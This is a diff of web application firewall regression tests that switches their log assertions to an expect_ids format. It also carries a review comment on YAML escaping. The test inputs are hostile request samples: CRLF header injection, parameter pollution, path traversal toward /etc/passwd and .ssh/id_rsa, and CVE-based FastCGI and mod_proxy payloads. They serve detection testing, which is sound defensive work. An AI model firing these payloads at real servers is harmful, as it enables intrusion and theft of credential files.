@@ -33,4 +34,5 @@ tests: uri: "/get?parameter%0d%0a=test" version: HTTP/1.0 output: - log_contains: id "921150" + log: + expect_ids: [921150] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml index 8609259e6..5a9a5f0e6 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?941151-1=test%0Dnext=more" version: "HTTP/1.1" output: - log_contains: "id \"921151\"" + log: + expect_ids: [921151] - test_id: 2 stages: - input: @@ -31,7 +32,8 @@ tests: uri: "/get?941151-2=test%0Anext=more" version: "HTTP/1.1" output: - log_contains: "id \"921151\"" + log: + expect_ids: [921151] - test_id: 3 stages: - input: @@ -45,7 +47,8 @@ tests: uri: "/get?941151-3=test%0A%0Dnext=more" version: "HTTP/1.1" output: - log_contains: "id \"921151\"" + log: + expect_ids: [921151] - test_id: 4 stages: - input: @@ -60,4 +63,5 @@ tests: data: '941151-4=test\r\nmore=text' version: "HTTP/1.1" output: - no_log_contains: "id \"921151\"" + log: + no_expect_ids: [921151] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml index 269e7a352..49354a855 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml @@ -18,7 +18,8 @@ tests: uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com" version: "HTTP/1.1" output: - log_contains: id "921160" + log: + expect_ids: [921160] - test_id: 2 desc: "HTTP Header Injection Attack via payload: w/header, correct line break, newlines after key" stages: 
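Review bot: Test 4 in 921151.yaml sends `data: '941151-4=test\r\nmore=text'` in single quotes, and YAML single-quoted scalars do not process backslash escapes, so the body carries the four literal characters `\`, `r`, `\`, `n` rather than a CR LF pair; the `no_expect_ids` assertion is then satisfied trivially and says nothing about how the rule treats real CRLF in a POST body. If the intent is "literal backslash sequences must not trigger", add a `desc` saying so; if the intent is real line breaks, use double quotes, `data: "941151-4=test\r\nmore=text"`. The query-string names in this file also say `941151-` while the rule under test is 921151, which is harmless but confusing when grepping logs.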
@@ -33,7 +34,8 @@ tests: uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com" version: "HTTP/1.1" output: - log_contains: id "921160" + log: + expect_ids: [921160] - test_id: 3 desc: "HTTP Header Injection Attack via payload: w/header" stages: @@ -48,7 +50,8 @@ tests: uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com" version: "HTTP/1.1" output: - log_contains: id "921160" + log: + expect_ids: [921160] - test_id: 4 desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in value rather than key" stages: @@ -63,7 +66,8 @@ tests: uri: "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com" version: "HTTP/1.1" output: - log_contains: id "921160" + log: + expect_ids: [921160] - test_id: 5 desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in key rather than value" stages: @@ -78,7 +82,8 @@ tests: uri: "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y" version: "HTTP/1.1" output: - log_contains: id "921160" + log: + expect_ids: [921160] - test_id: 6 desc: "Status Page Test - simple HTTP header Injection Attack via payload in value" stages: @@ -93,4 +98,5 @@ tests: uri: "/get?foo=%0d%0arefresh:%20www.bar.com" version: "HTTP/1.1" output: - log_contains: id "921160" + log: + expect_ids: [921160] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml index 6af9701df..7b322393a 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml @@ -18,7 +18,8 @@ tests: uri: "/?pineapple=pizza" version: "HTTP/1.1" output: - no_log_contains: "id \"921180\"" + log: + no_expect_ids: [921180] - # Standard GET request test_id: 2 stages: 
@@ -33,7 +34,8 @@ tests: uri: "/?pineapple=pizza&pizza=pineapple" version: "HTTP/1.1" output: - no_log_contains: "id \"921180\"" + log: + no_expect_ids: [921180] - # Standard GET request (Negative, no args) test_id: 3 stages: @@ -48,7 +50,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"921180\"" + log: + no_expect_ids: [921180] - # HPP payload test_id: 4 stages: @@ -63,7 +66,8 @@ tests: uri: "/?pineapple=pizza&pineapple=aint-pizza" version: "HTTP/1.1" output: - log_contains: "id \"921180\"" + log: + expect_ids: [921180] - # Similar arg names test_id: 5 stages: @@ -78,7 +82,8 @@ tests: uri: "/?pineapple=pizza&pineapple2=aint-pizza" version: "HTTP/1.1" output: - no_log_contains: "id \"921180\"" + log: + no_expect_ids: [921180] - # HPP payload with multiple iterations test_id: 6 stages: @@ -93,4 +98,5 @@ tests: uri: "/?pineapple=pizza&pineapple=aint-pizza&pineapple=is-pizza&pineapple=aint-pizza2" version: "HTTP/1.1" output: - log_contains: "id \"921180\"" + log: + expect_ids: [921180] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml index 3176f6c5c..f8138f8a2 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml @@ -17,7 +17,8 @@ tests: uri: "/foo%0Abar" version: "HTTP/1.1" output: - log_contains: id "921190" + log: + expect_ids: [921190] - test_id: 2 desc: "New line char in request filename (2)" stages: @@ -31,7 +32,8 @@ tests: uri: "/foo%0abar" version: "HTTP/1.1" output: - log_contains: id "921190" + log: + expect_ids: [921190] - test_id: 3 desc: "FastCGI variable injection: Nginx + PHP-FPM (CVE-2019-11043)" stages: @@ -45,7 +47,8 @@ tests: uri: "/index.php/PHP%0Ainfo.php?QQQ" version: "HTTP/1.1" output: - log_contains: id "921190" + log: + expect_ids: [921190] - test_id: 4 desc: "PHP Settings injection: Nginx + PHP-FPM (CVE-2019-11043)" stages: 
@@ -59,4 +62,5 @@ tests: uri: "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ" version: "HTTP/1.1" output: - log_contains: id "921190" + log: + expect_ids: [921190]
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml
index 70e89f148..dc397acbf 100644
--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml
@@ -19,7 +19,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: id "921200" + log: + no_expect_ids: [921200] - test_id: 2 desc: "Testing for FP, this should not trigger" stages:
@@ -35,7 +36,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: id "921200" + log: + no_expect_ids: [921200] - test_id: 3 desc: "Testing for FP, this should not trigger" stages:
@@ -51,7 +53,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: id "921200" + log: + no_expect_ids: [921200] - test_id: 4 desc: "Testing for rule, this should trigger" stages:
@@ -67,7 +70,8 @@ tests: port: 80 version: "HTTP/1.1" output: - log_contains: id "921200" + log: + expect_ids: [921200] - test_id: 5 desc: "Testing for rule, this should trigger" stages:
@@ -83,7 +87,8 @@ tests: port: 80 version: "HTTP/1.1" output: - log_contains: id "921200" + log: + expect_ids: [921200] - test_id: 6 desc: "Testing for rule, this should trigger" stages:
@@ -99,7 +104,8 @@ tests: port: 80 version: "HTTP/1.1" output: - log_contains: id "921200" + log: + expect_ids: [921200] - test_id: 7 desc: "Testing for rule, this should trigger" stages:
@@ -115,7 +121,8 @@ tests: port: 80 version: "HTTP/1.1" output: - log_contains: id "921200" + log: + expect_ids: [921200] - test_id: 8 desc: "Testing for rule, this should trigger" stages:
@@ -131,7 +138,8 @@ tests: port: 80 version: "HTTP/1.1" output: - log_contains: id "921200" + log: + expect_ids: [921200] - test_id: 9 desc: "Testing for rule, this should trigger" stages:
@@ -147,7 +155,8 @@ tests: port: 80 version: "HTTP/1.1" output: - log_contains: id "921200" + log: + expect_ids: [921200] - test_id: 10 desc: "Testing for rule, this should trigger" stages:
@@ -163,4 +172,5 @@ tests: port: 80 version: "HTTP/1.1" output: - log_contains: id "921200" + log: + expect_ids: [921200]
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml
index 44347f128..d338384ff 100644
--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921210.yaml
@@ -17,7 +17,8 @@ tests: uri: "/?foo[1]a=bar&foo[1]b=<evil>" version: "HTTP/1.1" output: - log_contains: id "921210" + log: + expect_ids: [921210] - test_id: 2 desc: "HTTP Parameter Pollution via bogus chars between square brackets of multi-dimensional array name" stages:
@@ -31,7 +32,8 @@ tests: uri: "/?foo[1]a[2]=bar" version: "HTTP/1.1" output: - log_contains: id "921210" + log: + expect_ids: [921210] - test_id: 3 desc: "HTTP Parameter Pollution false positive test" stages:
@@ -45,4 +47,5 @@ tests: uri: "/?foo[1][2]=bar" version: "HTTP/1.1" output: - no_log_contains: id "921210" + log: + no_expect_ids: [921210]
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml
index e5b4235e0..a255b5a10 100644
--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921220.yaml
@@ -18,4 +18,5 @@ tests: uri: "/get?foo[1]=bar" version: "HTTP/1.1" output: - log_contains: id "921220" + log: + expect_ids: [921220]
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml
index ad2d3659f..a63c737b7 100644
--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml
@@ -18,4 +18,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: id "921230" + log: + expect_ids: [921230]
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml
index 8272c730a..15915dff1 100644
--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml
@@ -17,7 +17,8 @@ tests: uri: "/?unix:AAAAAAAAA|http://coreruleset.org/" version: "HTTP/1.1" output: - log_contains: id "921240" + log: + expect_ids: [921240] - test_id: 2 desc: "Detect attacks against mod_proxy: CVE-2021-40438, URI encoded" stages:
@@ -31,4 +32,5 @@ tests: uri: "/?unix%3AAAAAAAAAA|http://coreruleset.org/" version: "HTTP/1.1" output: - log_contains: id "921240" + log: + expect_ids: [921240]
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml
index 61c80b4fd..060b8d368 100644
--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml
@@ -18,7 +18,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921421" + log: + expect_ids: [921421] - test_id: 2 desc: Bypass targeting recommended rules (rule 200006) stages:
@@ -33,7 +34,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921421" + log: + expect_ids: [921421] - test_id: 3 desc: Bypass targeting recommended rules (rule 200001) stages:
@@ -48,7 +50,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921421" + log: + expect_ids: [921421] - test_id: 4 desc: Bypass targeting recommended rules (rule 200001) stages:
@@ -63,7 +66,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921421" + log: + expect_ids: [921421] - test_id: 5 desc: Bypass targeting recommended rules (rule 200001) stages:
@@ -78,7 +82,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921421" + log: + expect_ids: [921421] - test_id: 6 desc: Negative test for 921421-1 stages:
@@ -93,7 +98,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421] - test_id: 7 desc: Negative test for 921421-2 stages:
@@ -108,7 +114,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421] - test_id: 8 desc: Negative test for 921421-3 stages:
@@ -123,7 +130,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421] - test_id: 9 desc: Negative test for 921421-4 stages:
@@ -138,7 +146,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421] - test_id: 10 desc: Negative test for 921421-5 stages:
@@ -153,7 +162,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421] - test_id: 11 desc: Negative test for rule 921421-6 stages:
@@ -168,7 +178,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421] - test_id: 12 desc: Negative test for rule 921421-7 stages:
@@ -183,4 +194,5 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921421" + log: + no_expect_ids: [921421]
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml
index 5d69957ec..e5b83d50b 100644
--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml
@@ -18,7 +18,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 2 desc: Bypass targeting recommended rules (rule 200006) stages:
@@ -33,7 +34,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 3 desc: Bypass targeting recommended rules (rule 200001) stages:
@@ -48,7 +50,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 4 desc: Bypass targeting recommended rules (rule 200001) stages:
@@ -63,7 +66,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 5 desc: Bypass targeting recommended rules (rule 200001) stages:
@@ -78,7 +82,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 6 desc: Bypass targeting recommended rules (rule 200001) stages:
@@ -93,7 +98,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 7 desc: Bypass targeting recommended rules (rule 200001) stages:
@@ -108,7 +114,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 8 desc: Bypass targeting recommended rules (rule 200001) stages:
@@ -123,7 +130,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "921422" + log: + expect_ids: [921422] - test_id: 9 desc: Negative test for 921422-1 stages:
@@ -138,7 +146,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 10 desc: Negative test for 921422-2 stages:
@@ -153,7 +162,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 11 desc: Negative test for 921422-3 stages:
@@ -168,7 +178,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 12 desc: Negative test for 921422-4 stages:
@@ -183,7 +194,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 13 desc: Negative test for 921422-5 stages:
@@ -198,7 +210,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 14 desc: Negative test for 921422-6 stages:
@@ -213,7 +226,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 15 desc: Negative test for rule 921422-7 stages:
@@ -228,7 +242,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 16 desc: Negative test for rule 921422-8 stages:
@@ -243,7 +258,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422] - test_id: 17 desc: Negative test for rule 921422-9 stages:
@@ -258,4 +274,5 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "921422" + log: + no_expect_ids: [921422]
diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml
index df7716d78..710fae5c3 100644
--- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml
+++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml
@@ -30,7 +30,8 @@ tests: Let me see if I can use utf-7. --boundary-- output: - log_contains: id "922100" + log: + expect_ids: [922100] - test_id: 2 desc: "Negative test: only allowed charsets when using _charset_" stages:
@@ -57,7 +58,8 @@ tests: This should be good as we use utf-8 that is allowed. --boundary-- output: - no_log_contains: id "922100" + log: + no_expect_ids: [922100] - test_id: 3 desc: "Positive test: don't allow substrings of valid charsets when using _charset_" stages:
@@ -84,4 +86,5 @@ tests: utf-8 is valid but utf- should not be. --boundary-- output: - log_contains: id "922100" + log: + expect_ids: [922100]
diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml
index ab02ff01a..90b479f2f 100644
--- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml
+++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml
@@ -30,7 +30,8 @@ tests: Knock knock. --boundary-- output: - log_contains: id "922110" + log: + expect_ids: [922110] - test_id: 2 desc: "Negative test: utf-8 is allowed" stages:
@@ -57,4 +58,5 @@ tests: I shold be allowed to get in. --boundary-- output: - no_log_contains: id "922110" + log: + no_expect_ids: [922110]
diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml
index c3d6693a2..fe49ae15b 100644
--- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml
+++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml
@@ -27,7 +27,8 @@ tests: Pineapple. Pizza. --boundary-- output: - log_contains: id "922120" + log: + expect_ids: [922120] - test_id: 2 desc: "Negative test: no content-transfer-encoding header should be good" stages:
@@ -50,4 +51,5 @@ tests: This should be good as there is no content-transfer-encoding header. --boundary-- output: - no_log_contains: id "922120" + log: + no_expect_ids: [922120]
diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml
index 8a35994d4..d9a96df21 100644
--- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml
+++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml
@@ -19,7 +19,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930100" + log: + expect_ids: [930100] - test_id: 2 desc: "Path Traversal Attack Triple Dot (/.../)" stages:
@@ -34,7 +35,8 @@ tests: uri: "/get?foo=.../.../WINDOWS/win.ini" version: "HTTP/1.1" output: - log_contains: id "930100" + log: + expect_ids: [930100] - test_id: 3 desc: "Path Traversal Attack Triple Dot (/.../) encoded: foo=.../.../WINDOWS/win.ini" stages:
@@ -49,7 +51,8 @@ tests: uri: "/get?foo=0x2e.%000x2f0x2e.%00/WINDOWS/win.ini" version: "HTTP/1.1" output: - log_contains: id "930100" + log: + expect_ids: [930100] - test_id: 4 desc: "Status Page Test - Path Traversal Attack (<backslash>../), partially encoded" stages:
@@ -65,4 +68,5 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930100" + log: + expect_ids: [930100]
diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml
index 75eccd74a..b217eaa0b 100644
--- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml
+++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml
@@ -19,7 +19,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 2 desc: "Path Traversal Attack (/../) query string" stages:
@@ -35,7 +36,8 @@ tests: uri: "/get?arg=../../../etc/passwd" version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 3 desc: "Path Traversal Attack (/../) query string" stages:
@@ -51,7 +53,8 @@ tests: data: "arg=../../../etc/passwd&foo=var" version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 4 desc: "Path Traversal Attack (/../) query string" stages:
@@ -66,7 +69,8 @@ tests: uri: "/get/foo../1234" version: "HTTP/1.1" output: - no_log_contains: id "930110" + log: + no_expect_ids: [930110] - test_id: 5 desc: "Path Traversal Attack (/../) query string" stages:
@@ -81,7 +85,8 @@ tests: uri: "/get/foo.../1234" version: "HTTP/1.1" output: - no_log_contains: id "930110" + log: + no_expect_ids: [930110] - test_id: 6 desc: "Path Traversal Attack (/../) query string" stages:
@@ -96,7 +101,8 @@ tests: uri: "/get/..foo" version: "HTTP/1.1" output: - no_log_contains: id "930110" + log: + no_expect_ids: [930110] - test_id: 7 desc: "Path Traversal Attack (/../) query string" stages:
@@ -111,7 +117,8 @@ tests: uri: "/get/.." version: "HTTP/1.1" output: - no_log_contains: id "930110" + log: + no_expect_ids: [930110] - test_id: 8 desc: 'Path Traversal Attack (..\) query string' stages:
@@ -126,7 +133,8 @@ tests: uri: '/get?arg=..\pineapple' version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 9 desc: 'Path Traversal Attack triple dot (.../) query string' stages:
@@ -141,7 +149,8 @@ tests: uri: '/get?foo=.../.../WINDOWS/win.ini' version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 10 desc: 'Path Traversal Attack (../) file upload' stages:
@@ -164,7 +173,8 @@ tests: ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 11 desc: 'Path Traversal Attack (..\) file upload' stages:
@@ -187,7 +197,8 @@ tests: ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110] - test_id: 12 desc: "Path Traversal Attack (;..;) query string" stages:
@@ -203,4 +214,5 @@ tests: uri: "/get?a=..;.\\.;\\." version: "HTTP/1.1" output: - log_contains: id "930110" + log: + expect_ids: [930110]
diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml
index e9ead764a..3a2b2268b 100644
--- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml
+++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml
@@ -22,7 +22,8 @@ tests: uri: "/get/index.php?file=News&op=../../../../../boot.ini%00" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 2 desc: Remote File Access Attempt (930120) from old modsec regressions stages:
@@ -42,7 +43,8 @@ tests: uri: "/get/index.php?file=News&op=/etc/passwd%00" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 3 desc: Remote File Access Attempt (930120) from old modsec regressions stages:
@@ -62,7 +64,8 @@ tests: uri: "/get/index.php?file=News&op=../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 4 desc: "OS File Access" stages:
@@ -77,7 +80,8 @@ tests: uri: "/get?foo=arg&path_comp=.ssh/id_rsa" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 5 desc: "LFI via parameter name: /sys" stages:
@@ -92,7 +96,8 @@ tests: uri: "/get?/sys/class=test" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 6 desc: "LFI via parameter value: /sys" stages:
@@ -107,7 +112,8 @@ tests: uri: "/get?test=/sys/class" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 7 desc: "LFI via parameter value: /etc/subuid" stages:
@@ -122,7 +128,8 @@ tests: uri: "/get?code=cat+%2Fetc%2Fsubuid" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 8 desc: "LFI via parameter value: /etc/subuid-" stages:
@@ -137,7 +144,8 @@ tests: uri: "/get?code=cat+%2Fetc%2Fsubuid-" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 9 desc: | YM9WT5NU
@@ -154,7 +162,8 @@ tests: uri: "/get?code=>/tmp/curl" version: "HTTP/1.1" output: - log_contains: id "930120" + log: + expect_ids: [930120] - test_id: 10 desc: | YM9WT5NU
@@ -171,4 +180,5 @@ tests: uri: "/get?code=>/tmp" version: "HTTP/1.1" output: - no_log_contains: id "930120" + log: + no_expect_ids: [930120]
diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml
index 6bee94f87..6eda72ce1 100644
--- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml
+++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml
@@ -21,7 +21,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 2 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages:
@@ -41,7 +42,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 3 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages:
@@ -61,7 +63,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 4 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages:
@@ -81,7 +84,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 5 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages:
@@ -101,7 +105,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 6 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages:
@@ -121,7 +126,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 7 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages:
@@ -141,7 +147,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 8 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages:
@@ -161,7 +168,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 9 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages:
@@ -181,7 +189,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121] - test_id: 10 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages:
@@ -201,4 +210,5 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "930121" + log: + expect_ids: [930121]
diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml
